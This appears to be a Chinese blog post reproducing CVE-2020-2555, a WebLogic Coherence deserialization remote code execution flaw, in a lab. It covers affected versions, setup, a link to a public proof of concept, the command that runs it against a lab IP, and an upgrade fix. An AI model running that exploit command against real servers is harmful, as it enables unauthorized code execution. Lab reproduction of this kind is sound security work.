您的位置: 首页  >  文章  >  Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

分类: 文章 2025-03-11 19:30:40

影响版本

Oracle Coherence 3.7.1.17

Oracle Coherence 12.1.3.0.0

Oracle Coherence 12.2.1.3.0.0

Oracle Coherence 12.2.1.4.0.0

漏洞搭建

以管理员的方式运行安装

java -jar fmw_12.1.3.0.0_wls.jar

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

安装时选择了“含示例的完整安装”。其他默认即可

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

Your-IP:7001/console打开页面

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

漏洞复现

POC地址:https://github.com/wsfengfan/CVE-2020-2555

py -2 CVE-2020-2555.py 192.168.111.131 7001 ./test.ser

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

Weblogic Cohence反序列化RCE(CVE-2020-2555)复现

修复建议

升级到最新版

相关推荐